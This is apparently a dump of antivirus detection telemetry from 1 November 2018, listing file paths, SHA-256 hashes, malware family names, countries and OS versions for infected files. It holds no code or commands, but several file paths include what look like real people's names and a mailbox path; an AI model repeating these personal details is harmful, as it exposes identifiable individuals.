  Row(detection=Row(filename='avscan-20181101-105926-a3433cbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105926-A3433CBF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.velldrin.smartvoiceassistant.exe', filepath='G:\\Android\\data\\com.velldrin.smartvoiceassistant.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='ZM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T07:22:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134306-174f4126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b61edb73\\AVSCAN-20181101-134248-14DAC64B\\AVSCAN-20181101-134306-174F4126', filesize=696000, name='ADWARE/Amonetize.Gen.#M1.#R1'), hash='df264ecdbc5c8b21c86dc394ca14fc894c929b64a3bf1044ab777262d605189d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:43:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142842-2211fe12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142842-2211FE12', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191345-496b06bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191345-496B06BF', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='af2d5b939fe28fb9cba8536cf9a07f753fac6e2ca0dada4d70cceab647f286be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AF2D5B939FE28FB9CBA8536CF9A07F753FAC6E2CA0DADA4D70CCEAB647F286BE', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R544'), hash='af2d5b939fe28fb9cba8536cf9a07f753fac6e2ca0dada4d70cceab647f286be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053428-2559df6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053428-2559DF6B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132857-457d07ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c541cc\\AVSCAN-20181101-132826-3FFFF9D5\\AVSCAN-20181101-132857-457D07EA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182424-86fe1bc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e161b4e\\AVSCAN-20181101-182406-83B728FC\\AVSCAN-20181101-182424-86FE1BC5', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120838-28ec006a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b005545\\AVSCAN-20181101-120816-253D3B56\\AVSCAN-20181101-120838-28EC006A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_8_5_5.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Audition 1.5\\help\\ja_JP\\html\\1_8_5_5.html', filesize=1620000, name='W32/Chir.B.#M1.#R1'), hash='564db0c9450b80923355494e3c95d2a39861bf92e9ba41843186ffe22b04ade8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T14:48:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='inv-fxt-a4892492.doc', filepath='/Users/dmezey/Library/Mail/V4/28B0FD2B-D3A8-4B79-BEBE-968F680C3E21/INBOX.mbox/446C2743-A6BA-4F02-83D9-27C24ECD706E/Data/0/9/3/Attachments/390334/2/INV-FXT-A4892492.doc', filesize=128000, name='VBA/Dldr.Agent.ytejr.#M0.#R0'), hash='3f92ef20a0287417246d69a86c201c47048c1d667e45e729469d2004a63a2f5a', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:10:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095242-67a92687', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b060310d\\AVSCAN-20181101-094926-4B2075E8\\AVSCAN-20181101-095242-67A92687', filesize=192000, name='TR/Rogue.192000.9.#M1.#R1'), hash='767e7cef883679bed2576504ca4cf079d8cf48360f85e2d79fc4d41f73a2610e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:52:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:32:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053457-2867e954', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053457-2867E954', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:35:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222555-df9e0f8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_070199db\\AVSCAN-20181101-222427-D46CAF13\\AVSCAN-20181101-222555-DF9E0F8C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T21:19:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002929-65f2765a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002929-65F2765A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202933-04ac9069', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea57e5c6\\AVSCAN-20181101-202918-02403855\\AVSCAN-20181101-202933-04AC9069', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:29:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111809-79534c50', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-111740-DBCAEAA8\\AVSCAN-20181101-111809-79534C50', filesize=64000, name='TR/Crypt.ULPM.Gen.#M300.#R4004'), hash='3ff29538c79d03531216faa7dbff7f24fbe90a046da1452cbe670b9ad9d2ed6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:18:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='i:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T10:42:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T07:21:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003008-47e70dc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235744-2DA07E8C\\AVSCAN-20181102-003008-47E70DC6', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:30:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200454-b1894e1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c932ae92\\AVSCAN-20181101-200421-AF6D5003\\AVSCAN-20181101-200454-B1894E1A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:05:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='french.scr', filepath='F:\\New folder\\Corel Draw 12\\French\\French.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_8_5_5.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Audition 1.5\\help\\ja_JP\\html\\1_8_5_5.html', filesize=1620000, name='W32/Chir.B.#M1.#R1'), hash='564db0c9450b80923355494e3c95d2a39861bf92e9ba41843186ffe22b04ade8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184119-8b311293', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_965a4924\\AVSCAN-20181101-184037-861CC1D3\\AVSCAN-20181101-184119-8B311293', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxac4.tmp', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temp\\dxaC3.tmp\\dxaC4.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:59:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='F:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:36:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp.exe', filepath='E:\\zeyad ramadan\\سيارات\\TMP.exe', filesize=832000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='21c5c33103ee2ca3d5723d62e26bc9f90d46a4c919e765b328a5172f0af63136', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T14:49:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0284833.exe', filepath='\\?\\C:\\System Volume Information\\_restore{34494423-D52D-4FAF-9FEA-B82870C76EE3}\\RP2692\\A0284833.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='ebad2f54327c1c1d9205662e7b124e7fbb35ff373721599d9882b8a45856c8a5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:28:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150357-b9e85bb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150357-B9E85BB5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150358-c2559246', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150358-C2559246', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  JAN 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='dd55f2ae2bef1b0a07d8f2cbc4a878343b0c62e34cc49407a8de91b78153a7a3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bbsjyhef.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\BbSjyHef.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161523-247a3a2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-161523-247A3A2F', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:45:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152354-4b902c8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152354-4B902C8E', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='815ab391c277844d03754b2c7dfeb731fd37388e', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\815ab391c277844d03754b2c7dfeb731fd37388e', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='afcefa4e5ba531376e494a83497a547de83d982397c66b839cee82a18b841193', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:08:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\Aspen Framework\\instmsiw.exe', filesize=1856000, name='W32/Small.L.#M1.#R1'), hash='931be25e2088d968b714c587ff245486b4eade3d6df13be9cfc113cdf72ad7fc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe779_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe779 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:45:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be9ce919164d833c2690a8db378dd49422ed4a621524407fcf853da3992e59bd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BE9CE919164D833C2690A8DB378DD49422ED4A621524407FCF853DA3992E59BD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='be9ce919164d833c2690a8db378dd49422ed4a621524407fcf853da3992e59bd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lzpk_0446297245.doc', filepath='G:\\GPArhiv\\LZPK_0446297245.doc', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='b1cb5003bebe829f78836ffefd09450abcb1947b28f2fdd110c745cca89cb66b', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T18:38:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152129-836435bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152129-836435BD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081830-ffdff1e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36a12076\\AVSCAN-20181101-081728-F44B9C1B\\AVSCAN-20181101-081830-FFDFF1E6', filesize=40000, name='HTML/Infected.WebPage.Gen.#M1.#R1'), hash='941728eae9f2e067adc34f1fa8a4f497540d0fba9e95eb26b0593b3aa11d28fc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-062843-8d5e71dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_293ada43\\AVSCAN-20181101-062504-6219FBB3\\AVSCAN-20181101-062843-8D5E71DD', filesize=7232000, name='HEUR/AGEN.1014567.#M1.#R1'), hash='cdd589e4299501dafddd9901450b24b6103ef55cc6496ee13a813585379d5f58', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:29:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:16:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new94o1rrzd.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\7RESSCWK\\new94O1RRZD.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='dfc3e8b7ff305871866a801fac09af5ae3a2f563ef210325866324f1d570929b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:26:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='richieste commissioni.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\richieste commissioni\\richieste commissioni.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack_pes_2019_32d298d.exe', filepath='F:\\CRACK_PES_2019_32D298D.EXE', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='a5de74fd8225883fb2e96665365419f20b7594280238b32190618b2705f680e3', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T23:43:45Z'), dt=datetime.date(2018, 11, 1)),
